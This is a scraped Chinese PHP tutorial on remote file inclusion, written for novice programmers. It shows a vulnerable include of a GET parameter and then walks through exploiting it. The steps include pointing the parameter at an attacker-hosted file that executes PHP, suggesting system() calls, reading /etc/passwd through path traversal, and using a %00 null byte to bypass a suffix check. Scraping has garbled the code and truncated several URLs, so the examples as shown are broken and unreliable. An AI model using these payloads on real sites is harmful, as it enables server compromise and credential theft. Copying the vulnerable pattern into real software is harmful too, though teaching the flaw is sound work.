Heim  >  Artikel  >  Backend-Entwicklung  >  探讨PHP远程文件包含漏洞产生原因_PHP教程

探讨PHP远程文件包含漏洞产生原因_PHP教程

WBOY
WBOYOriginal
2016-07-15 13:34:131390Durchsuche

对于初级

首先的问题是,什么才是”远程文件包含漏洞“?简要的回答是服务器通过PHP的任意文件包含过滤不严,从而去执行一个恶意文件,这是个程序员过滤上的问题,请记住,所有的cgi程序都有这样的bug。

1.找出PHP远程文件包含漏洞bug:

为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的文件。在PHP里,我们使用include()函数,它的工作流程:

如果你在Main.PHP里包含include1.PHP,我将这样写include("include1.PHP").不是很科学,但你要知道其中的道理。
我们先看这个,当用户输入通过后就包含文件,也就是

<ol class="dp-xml">
<li class="alt"><span><span>if ($_GET	<br>
	
	) {  </span></span></li>
<li><span>include $_GET	<br>
	
	;  </span></li>
<li class="alt"><span>} else {  </span></li>
<li>
<span>include "home.</span>PHP<span>";  </span>
</li>
<li class="alt"><span>} </span></li>
</ol>

这种结构在动态网站里是常见的,问题是它允许这样 [url]http://www.target.com/explame.PHP?page=main.PHP[/url] 或者[url]http://www.target.com/explame.PHP?page=downloads.PHP[/url]来查看。无论如何,如果你的程序里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,文件包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程序员依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。

2.测试

这里有个远程文件包含的例子,目的只有一个,为了你的程序安全,我们来看具体的

[url]http://www.target.com/explame.PHP?page=zizzy[/url]

Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.PHP on line 3
Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/PHP') in /var/www/htdocs/index.PHP on line 3

PHP输出的这些错误信息告诉我们,程序去包含文件/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的文件,现在理解PHP远程文件包含漏洞了吧。

3.利用

PHP确实很好,可以远程调用文件,那我创建一个yeah.txt,放在我的站上[url]http://www.mysite.com/yeah.txt.[/url]内容这样

<ol class="dp-xml">
<li class="alt"><span><span class="tag"><span> ?  </span></span></span></li>
<li><span>echo "Wow,test!";  </span></li>
<li class="alt">
<span class="tag">?></span><span> </span>
</li>
</ol>

那么[url]http://www.target.com/explame.PHP?pa...e.com/yeah.txt[/url]
OK,回显Wow,test!,这样就执行了。读取config.PHP也不难吧,里面放了mysql密码啊。把yeah.txt写成 PHPinfo; ?>看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../../../../etc/passwd。知道什么叫真正的包含了吧。

4.另一种PHP远程文件包含漏洞的原理

有时程序员换种写法,写成这样,限制了包含范围

<ol class="dp-xml">
<li class="alt"><span><span>if ($_GET	<br>
	
	) {  </span></span></li>
<li>
<span>include "$_GET	<br>
	
	.</span>PHP<span>";  </span>
</li>
<li class="alt"><span>} else {  </span></li>
<li>
<span>include "home.</span>PHP<span>";  </span>
</li>
<li class="alt"><span>} </span></li>
</ol>

我们提交[url]http://www.target.com/explame.PHP?pa...e.com/yeah.txt[/url]

Warning: main([url]http://www.mysite.com/yeah.txt.PHP[/url]): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.PHP on line 3

Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.PHP' for inclusion (include_path='.:/usr/local/lib/PHP') in /var/www/htdocs/explame.PHP on line 3

包含失败了,限制了后缀名为PHP,那mysite.com的yeah.txt改为yeah.PHP,ok,照样执行了
那passwd怎么办

Warning: main(../../../../../../../etc/passwd.PHP): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.PHP on line 3

Warning: main(): Failed opening '../../../../../../../etc/passwd.PHP' for inclusion (include_path='.:/usr/local/lib/PHP') in /var/www/htdocs/explame.PHP on line 3

在这里使用个NUL字符,也就是%00来跳过检测

[url]http://www.target.com/explame.PHP?pa.../etc/passwd%00[/url]

看见了吧。

5.建议

包含文件时最好指定好包含哪一个文件,或者过滤好提交的的变量,这也就是这篇PHP远程文件包含漏洞文章的目的,不是写给hacking的人看,而是写给那些初涉程序员的人,这样的文章网上很多,只要有人受益,也就达到目的了。


www.bkjia.comtruehttp://www.bkjia.com/PHPjc/446010.htmlTechArticle对于初级 首先的问题是,什么才是远程文件包含漏洞?简要的回答是服务器通过PHP的任意文件包含过滤不严,从而去执行一个恶意文件,这...
Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn